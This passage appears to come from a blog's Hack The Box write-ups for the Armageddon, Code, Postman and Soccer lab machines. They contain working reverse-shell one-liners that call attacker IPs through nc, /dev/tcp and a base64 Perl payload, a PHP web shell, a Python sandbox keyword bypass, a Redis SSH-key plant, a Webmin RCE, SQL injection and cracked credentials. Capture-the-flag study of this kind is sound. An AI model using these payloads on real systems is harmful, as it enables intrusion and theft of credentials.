--------------------------------------------------------------------------------\n[i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname'\narmageddon.htb>> whoami\napache\nMysql Database\nIn a settings.php file we find the credentials for Drupal's MySQL database.\n$databases = array (\n 'default' => array (\n 'default' => array (\n 'database' => 'drupal',\n 'username' => 'drupaluser',\n 'password' => 'CQHEy@9M*m23gBVj',\n 'host' => 'localhost',\n 'port' => '',\n 'driver' => 'mysql',\n 'prefix' => '',\n ),\n ),\n);\nGetting hashes from bruce and admin\nStill from the shell obtained with the exploit (not interactive, but fairly stable), we retrieve the hashes of bruce and admin:\narmageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e \"SELECT * FROM users\"\nuid name pass mail theme signature signature_format created access login status timezone language picture init data\n0 NULL 0 0 0 0 NULL 0 NULL\n1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:\"overlay\";i:1;}\nCracking hashes of bruce (user.txt)\nWe crack it with hashcat:\nhashcat ./hash.txt ~/wordlists/rockyou.txt --show\nHash-mode was not specified with -m. Attempting to auto-detect hash mode. 
The following mode was auto-detected as the only one matching your input hash:\n7900 | Drupal7 | Forums, CMS, E-Commerce\nNOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!\nDo NOT report auto-detect issues unless you are certain of the hash type.\n$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo\nWe connect over SSH as the user brucetherealadmin:\n┌──(kali㉿kali)-[~/htb/Armageddon]\n└─$ ssh brucetherealadmin@10.10.10.233\nbrucetherealadmin@10.10.10.233's password:\nLast failed login: Thu Apr 3 22:28:06 BST 2025 from 10.10.14.17 on ssh:notty\nThere were 3 failed login attempts since the last successful login.\nLast login: Fri Mar 19 08:01:19 2021 from 10.10.14.5\n[brucetherealadmin@armageddon ~]$\n[brucetherealadmin@armageddon ~]$ whoami\nbrucetherealadmin\n[brucetherealadmin@armageddon ~]$ cat user.txt\nf0f8.....bbcc\nPrivilege Escalation\nsnap install as root\nWe need to run sudo -l. We observe that we can run \"snap install\" as root. That is, we can install any snap package as root. 
So I was able to create a malicious package that installs and runs during installation, opening a shell as root.\n","date":"2025-04-07T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/armageddon-htb/","title":"HTB | Armageddon"},{"content":" Machine name: Code, OS: Linux, IP: 10.10.11.62, Difficulty: Easy\nUsers\nmartin:nafeelswordsmaster\ndevelopment:development\nEnumeration\nnmap\n┌──(kali㉿kali)-[~/htb]\n└─$ nmap -sC -sV -An -p- -vvv -T4 10.10.11.62\nPORT STATE SERVICE REASON VERSION\n22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)\n| ssh-rsa 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\n| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiXZTkrXQPMXdU8ZTTQI45kkF2N38hyDVed+2fgp6nB3sR/mu/7K4yDqKQSDuvxiGe08r1b1STa/LZUjnFCfgg=\n| 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8Cwf2cBH9EDSARPML82QqjkV811d+Hsjrly11/PHfu\n5000/tcp open http syn-ack Gunicorn 20.0.4\n|_http-title: Python Code Editor\n| http-methods:\n|_ Supported Methods: GET HEAD OPTIONS\n|_http-server-header: gunicorn/20.0.4\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\nFoothold\nPython sandbox (port 5000)\nOn port 5000 we find a sandbox that lets us run Python code. 
However, after a few tests we notice that some keywords are forbidden, which prevents certain commands from running.\nRestricted keywords\nI made a list, as I went along, of the keywords that are not accepted\n## Restricted keywords\nimport\nos\nread\npopen\nopen\n__builtins__\napp-production\nreverse shell\nI finally managed to bypass the restriction by finding keywords that allow remote code execution:\n## Bypass the restriction on the \"os\" keyword\nlib = globals()[\"o\"+\"s\"]\n## Bypass the restriction on the \"system\" keyword\ncmd = \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.4 1337 >/tmp/f\"\ngetattr(lib, \"syst\" + \"em\")(cmd) # Run the command\n## Print the list of directories\nprint(lib.listdir(\"/home/app-production\"))\n┌──(kali㉿kali)-[~/htb/Code]\n└─$ nc -lnvp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.14.4] from (UNKNOWN) [10.10.11.62] 32960\nbash: cannot set terminal process group (5014): Inappropriate ioctl for device\nbash: no job control in this shell\napp-production@code:~/app$ whoami\nwhoami\napp-production\napp-production@code:~/app$ cat ../user.txt\ncat ../user.txt\n8f81.....e49f\ndatabase.db : martin's password\nWe find a database.db file.\napp-production@code:~/app$ grep -rni pass\napp.py:17: password = db.Column(db.String(80), nullable=False)\napp.py:43: password = hashlib.md5(request.form['password'].encode()).hexdigest()\napp.py:48: new_user = User(username=username, password=password)\napp.py:60: password = hashlib.md5(request.form['password'].encode()).hexdigest()\napp.py:61: user = User.query.filter_by(username=username, password=password).first()\n...\n... 
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>> Binary file instance/database.db matches <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>\nWe quickly find a hash of martin's password by displaying database.db directly, without even going through sqlite.\napp-production@code:~/app$ grep -rnia martin\n## 3de6f30c4a09c27fc71932bfc68474be <-----------\n���QQR*Mmartin3de6f30c4a09c27fc71932bfc68474be/#Mdevelopment759b74ce43947f5f4c91aeddc3e5bad3\n���&$nceCprint(\"Functionality test\")Testent\n$ hashcat -m 0 hash.txt --wordlist ~/wordlists/rockyou.txt --show\n3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster\ndevelopment account:\n$ hashcat -m 0 hash2.txt --wordlist ~/wordlists/rockyou.txt --show\n759b74ce43947f5f4c91aeddc3e5bad3:development\nPrivilege Escalation\nEnumeration with martin\nMartin can run the script /usr/bin/backy.sh as root:\nmartin@code:/home/app-production/app$ sudo -l\nMatching Defaults entries for martin on localhost:\n env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\nUser martin may run the following commands on localhost:\n (ALL : ALL) NOPASSWD: /usr/bin/backy.sh\nExploit : /usr/bin/backy.sh\nWe use \"....\" instead of \"..\" and \"//\" instead of \"/\", because the script strips \"../\" whenever it sees it. But when it removes \"../\" in my case, that rebuilds another \"../\"! So it works.\nmartin@code:~$ cat t.json\n{\n \"destination\": \"/home/martin/backups/\",\n \"multiprocessing\": true,\n \"verbose_log\": false,\n \"directories_to_archive\": [\n \"/home/....//root/root.txt\"\n ],\n \"exclude\": [\n \".*\"\n ]\n}\n------------------------------------\n## Replacing it with this, we do archive the root directory\nmartin@code:~$ cat task.json\n{\n \"destination\": \"/home/martin/backups/\",\n \"multiprocessing\": true,\n \"verbose_log\": false,\n \"directories_to_archive\": [\n \"/home/....//root\",\n \"/var/....//root\"\n ]\n}\nmartin@code:~$ sudo /usr/bin/backy.sh ./task.json\n2025/03/26 11:09:19 🍀 backy 1.2\n2025/03/26 11:09:19 📋 Working with ./task.json ...\n2025/03/26 11:09:19 💤 Nothing to sync\n2025/03/26 11:09:19 📤 Archiving: [/home/../root /var/../root]\n2025/03/26 11:09:19 📥 To: /home/martin/backups\n... 
2025/03/26 11:09:19 📦\n2025/03/26 11:09:19 📦 📦\nmartin@code:~/backups$ tar -xjf code_var_.._root_2025_March.tar.bz2\nmartin@code:~/backups$ ls\ncode_home_app-production_app_2024_August.tar.bz2 code_home_.._root_2025_March.tar.bz2 code_var_.._root_2025_March.tar.bz2 root task.json\nmartin@code:~/backups$ cd root/\nmartin@code:~/backups/root$ ls\nroot.txt scripts\nmartin@code:~/backups/root$ cat root.txt\n80a6.....33d8\nSSH root\nWe also retrieve root's SSH keys:\nmartin@code:~/backups/root$ cd .ssh/\nmartin@code:~/backups/root/.ssh$ ls\nauthorized_keys id_rsa\nmartin@code:~/backups/root/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\n...\n-----END OPENSSH PRIVATE KEY-----\nmartin@code:~/backups/root/.ssh$ cat authorized_keys\nssh-rsa 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 root@code\nWe connect using the id_rsa key retrieved earlier.\n┌──(kali㉿kali)-[~/htb/Code]\n└─$ ssh root@10.10.11.62 -i id_rsa\nWelcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)\n * Documentation: https://help.ubuntu.com\n * Management: https://landscape.canonical.com\n * Support: https://ubuntu.com/pro\nSystem information as of Wed 26 Mar 2025 12:38:11 PM UTC\nSystem load: 0.06\nUsage of /: 52.2% of 5.33GB\nMemory usage: 18%\nSwap usage: 0%\nProcesses: 237\nUsers logged in: 1\nIPv4 address for eth0: 10.10.11.62\nIPv6 address for eth0: dead:beef::250:56ff:fe94:61f7\nExpanded Security Maintenance for Applications is not enabled.\n0 updates can be applied immediately.\nEnable ESM Apps to receive additional future security updates.\nSee https://ubuntu.com/esm or run: sudo pro status\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings\nLast login: Wed Mar 26 12:38:11 2025 from 10.10.14.4\nroot@code:~# whoami\nroot\nroot@code:~# cat root.txt\n80a6.....33d8\n","date":"2025-03-26T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/code-htb/","title":"HTB | Code"},{"content":" Machine name: Postman, OS: Linux, IP: 10.10.10.160, Difficulty: Easy\nUsers\n## SSH key pass phrase\nmatt : computer2008\nEnumeration\nnmap\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.160\nPORT STATE SERVICE REASON VERSION\n22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDem1MnCQG+yciWyLak5YeSzxh4HxjCgxKVfNc1LN+vE1OecEx+cu0bTD5xdQJmyKEkpZ+AVjhQo/esF09a94eMNKcp+bhK1g3wqzLyr6kwE0wTncuKD2bA9LCKOcM6W5GpHKUywB5A/TMPJ7UXeygHseFUZEa+yAYlhFKTt6QTmkLs64sqCna+D/cvtKaB4O9C+DNv5/W66caIaS/B/lPeqLiRoX1ad/GMacLFzqCwgaYeZ9YBnwIstsDcvK9+kCaUE7g2vdQ7JtnX0+kVlIXRi0WXta+BhWuGFWtOV0NYM9IDRkGjSXA4qOyUOBklwvienPt1x2jBrjV8v3p78Tzz\n| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIRgCn2sRihplwq7a2XuFsHzC9hW+qA/QsZif9QKAEBiUK6jv/B+UxDiPJiQp3KZ3tX6Arff/FC0NXK27c3EppI=\n| 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)\n|_ssh-ed25519 
AAAAC3NzaC1lZDI1NTE5AAAAIF3FKsLVdJ5BN8bLpf80Gw89+4wUslxhI3wYfnS+53Xd\n80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))\n| http-methods:\n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF\n|_http-title: The Cyber Geek's Personal Website\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n6379/tcp open redis syn-ack Redis key-value store 4.0.9\n10000/tcp open http syn-ack MiniServ 1.910 (Webmin httpd)\n|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).\n| http-methods:\n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301\nFoothold\nRedis server\n$ nc 10.10.10.160 6379\ninfo\n$2729\n## Server\nredis_version:4.0.9\n...\nOr\n┌──(kali㉿kali)-[~]\n└─$ nmap --script redis-info -sV -p 6379 10.10.10.160\nStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 08:55 EDT\nNmap scan report for postman (10.10.10.160)\nHost is up (0.015s latency).\nPORT STATE SERVICE VERSION\n6379/tcp open redis Redis key-value store 4.0.9 (64 bits)\n| redis-info:\n| Version: 4.0.9\n| Operating System: Linux 4.15.0-58-generic x86_64\n| Architecture: 64 bits\n| Process ID: 656\n| Used CPU (sys): 4.58\n| Used CPU (user): 1.78\n| Connected clients: 1\n| Connected slaves: 0\n| Used memory: 820.55K\n| Role: master\n| Bind addresses:\n| 0.0.0.0\n| ::1\n| Client connections:\n|_ 10.10.14.13\nredis user - SSH key upload\nUsing the HackTricks page on pentesting Redis (port 6379): https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html\nWe try several exploits. Finally, we manage to upload an SSH key and log in as the redis user.\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ ssh-keygen\n...\n... 
┌──(kali㉿kali)-[~/htb/Postman]\n└─$ (echo -e \"\\n\\n\"; cat ./id_rsa.pub; echo -e \"\\n\\n\") > spaced_key.txt\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ cat spaced_key.txt\nssh-rsa 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 kali@kali\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key\nOK\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ redis-cli -h 10.10.10.160\n10.10.10.160:6379> config set dir /var/lib/redis/.ssh\nOK\n10.10.10.160:6379> config set dbfilename \"authorized_keys\"\nOK\n10.10.10.160:6379> save\nOK\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ ssh -i id_rsa redis@10.10.10.160\nWelcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)\n...\nLast login: Mon Aug 26 03:04:25 2019 from 10.10.10.1\nredis@Postman:~$ whoami\nredis\nredis -> Matt\nssh key backup\nThanks to linpeas, we find a .bak file containing SSH keys.\n╔══════════╣ Backup files (limited 100)\n-rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak\nHowever, we need to decrypt this key and find the passphrase. 
We can convert it with ssh2john and then try to crack it with rockyou.txt and john, of course:\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ ssh2john ./matt.key > matt.hash\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ john --format=ssh matt.hash --wordlist=/usr/share/wordlists/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])\nCost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes\nCost 2 (iteration count) is 2 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\ncomputer2008 (./matt.key)\n1g 0:00:00:00 DONE (2025-03-13 11:08) 3.333g/s 822720p/s 822720c/s 822720C/s comunista..comett\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed.\nWe find the passphrase! computer2008\nWe can even decrypt the key permanently so that we no longer have to type the password:\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ openssl rsa -in matt.key -out matt.decrypted_key -passin pass:computer2008\nwriting RSA key\nHowever, the SSH connection does not work. The key is no longer the right one, but the passphrase it was encrypted with then allowed us to log in with \"su\" from the shell obtained earlier (user: redis):\nredis@Postman:/opt$ su Matt\nPassword:\nMatt@Postman:/opt$ whoami\nMatt\nMatt - user flag\nMatt@Postman:/opt$ cd\nMatt@Postman:~$ ls\nuser.txt\nMatt@Postman:~$ cat user.txt\n9259.....a41d\nPrivilege Escalation\nAuthenticated RCE on webmin 1.910\nAt the start of the machine's enumeration we had spotted that the webmin service could potentially be vulnerable to an RCE, but you had to be logged in as a user in order to exploit it. 
We now have the user Matt with his password (computer2008).\nAfter some searching online, we find a Python script on GitHub that exploits this vulnerability and runs commands.\nRunning linpeas as the user Matt, and even as the user redis, we had noticed that webmin was running as root on the machine! By managing to exploit the RCE in webmin, we could therefore run commands as root:\n════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════\n╚════════════════════════════════════════════════╝\n╔══════════╣ Running processes (cleaned)\n╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes\n...\nredis 656 0.0 0.3 51576 3648 ? Ssl 10:44 0:13 /usr/bin/redis-server 0.0.0.0:6379\nroot 672 0.0 1.6 331332 14812 ? Ss 10:44 0:00 /usr/sbin/apache2 -k start\nwww-data 673 0.0 1.1 335856 10116 ? S 10:44 0:00 _ /usr/sbin/apache2 -k start\nwww-data 674 0.0 1.0 335840 10056 ? S 10:44 0:00 _ /usr/sbin/apache2 -k start\nwww-data 675 0.0 1.1 335856 10120 ? S 10:44 0:00 _ /usr/sbin/apache2 -k start\n...\nroot 751 0.0 3.1 95308 29348 ? Ss 10:44 0:02 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf\n## ^^^\n## |||\n## |||\nWe run the Python script that exploits webmin and obtain a shell as root: ( https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/tree/master )\n┌──(kali㉿kali)-[~/htb/Postman]\n└─$ python3 webmin_exploit.py --ip_address 10.10.10.160 --port 10000 --lhost 10.10.14.13 --lport 1337 --user Matt --password computer2008\nWebmin 1.9101- 'Package updates' RCE\n[+] Generating Payload... 
[+] Reverse Payload Generated : u=acl%2Fapt\u0026amp;u=%20%7C%20bash%20-c%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4xMzoxMzM3Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0%2BZmRvcGVuKCRjLHcpO3doaWxlKDw%2BKXtpZigkXz1%2BIC8oLiopLyl7c3lzdGVtICQxO319Oyc%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22\u0026amp;ok_top=Update+Selected+Packages [+] Attempting to login to Webmin [+] Login Successful [+] Attempting to Exploit [+] Exploited Successfully ---------------------------------------- ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.160] 41548 whoami root cat /root/root.txt a417.....1153 ","date":"2025-03-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/postman-htb/","title":"HTB | Postman"},{"content":" Machine name OS IP Difficulty Soccer Linux 10.10.11.194 Easy Users 1 player : PlayerOftheMatch2022 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.194 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-10 18:21 EDT PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA) | ssh-rsa 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 | 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk= | 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519) |_ssh-ed25519 
AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/ 80/tcp open http syn-ack nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://soccer.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.18.0 (Ubuntu) 9091/tcp open xmltec-xmlmail? syn-ack | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: | HTTP/1.1 400 Bad Request | Connection: close | GetRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 139 | Date: Mon, 10 Mar 2025 22:22:14 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot GET /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; | \u0026lt;/html\u0026gt; | HTTPOptions, RTSPRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 143 | Date: Mon, 10 Mar 2025 22:22:14 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot OPTIONS /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; |_ \u0026lt;/html\u0026gt; gobuster - tiny file manager 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(kali㉿kali)-[~] └─$ gobuster dir --url http://soccer.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
=============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://soccer.htb/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /tiny (Status: 301) [Size: 178] [--\u0026gt; http://soccer.htb/tiny/] On arrive ensuite sur une page de connexion \u0026ldquo;Tiny File Manager\u0026rdquo;. Après quelques recherches, on essaye les mots de passes par défaut et on trouve :\n1 admin : admin@123 Foothold Tiny file manager RCE : searchsploit Avec searchsploit on trouve un RCE authentifié.\n1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ searchsploit tiny file manager ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Manx 1.0.1 - \u0026#39;/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php\u0026#39; Multiple Cross-Site Scripting Vulnerabilities | php/webapps/36364.txt Manx 1.0.1 - \u0026#39;/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php\u0026#39; Multiple Cross-Site Scripting Vulnerabilities | php/webapps/36365.txt MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload | php/webapps/15768.txt Tiny File Manager 2.4.6 - Remote Code Execution (RCE) | php/webapps/50828.sh TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload | 
php/webapps/15194.txt ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results RCE exploit On se connecte les creds par défaut :\nadmin : admin@123 On peut uploader facilement un fichier php dans le dossier tiny/uploads sur l\u0026rsquo;interface d\u0026rsquo;aministration: \u003c?php system($_GET['cmd']) ?\u003e Ensuite, on execute un reverse shell. On a mis la commande en base64 pour eviter les bugs avec les caractères spéciaux :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 $ http://soccer.htb/tiny/uploads/a.php?cmd=echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvOTAwMSAwPiYx+|+base64+-d+|+bash ---------------------------------- ┌──(kali㉿kali)-[~/htb/Soccer] └─$ nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.194] 34268 sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; www-data@soccer:~/html/tiny/uploads$ export TERM=xterm export TERM=xterm www-data@soccer:~/html/tiny/uploads$ ^Z zsh: suspended nc -lnvp 9001 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ stty raw -echo; fg [1] + continued nc -lnvp 9001 www-data@soccer:~/html/tiny/uploads$ www-data@soccer:~/html/tiny/uploads$ whoami www-data www-data@soccer:~/html/tiny/uploads$ cat /home/player/user.txt cat: /home/player/user.txt: Permission denied soc-player.soccer.htb A l\u0026rsquo;aide de linpeas, on trouve un autre nom de domaine qui nous donne accès à une nouvelle page.\n1 2 3 4 5 www-data@soccer:/tmp$ cat linpeas.out | grep soccer.htb 127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb server_name soc-player.soccer.htb; return 301 http://soccer.htb$request_uri; server_name soccer.htb; Searching for football tickets On arrive sur une page web où l\u0026rsquo;ont peut créer un compte puis se 
connecter. On a alors accès à une page avec un Ticket id. On peut rechercher si un ticket existe ou non en ecrivant un \u0026lsquo;id\u0026rsquo; de ticket, un nombre entier. Si le site web repond \u0026ldquo;Ticket exists\u0026rdquo;, alors le ticket existe. Sinon, si on a \u0026ldquo;Ticket doesn\u0026rsquo;t exist\u0026rdquo;, c\u0026rsquo;est qu\u0026rsquo;il n\u0026rsquo;existe pas. On essaye de tester une injection SQL :\n1 1 or 1=1; -- ça fonctionne! Il nous dit que le ticket est valide ! Alors qu\u0026rsquo;il est bien invalide normalement. On a donc ce qu\u0026rsquo;on appelle une Boolean (Blind ?) SQL Injection. C\u0026rsquo;est à dire qu\u0026rsquo;il faut faire des requetes à l\u0026rsquo;aveugle, et selon la réponse, Vrai ou faux, on déduit le nom des tables, colonnes etc.\nBoolean (Blind ?) SQL Injection 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ sqlmap -u \u0026#34;ws://soc-player.soccer.htb:9091\u0026#34; --threads 10 --data \u0026#39;{\u0026#34;id\u0026#34;:\u0026#34;1\u0026#34;}\u0026#39; --batch -D soccer_db -T accounts --dump ___ __H__ ___ ___[,]_____ ___ ___ {1.8.11#stable} |_ -| . [)] | .\u0026#39;| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:14:53 /2025-03-12/ JSON data found in POST body. Do you want to process it? 
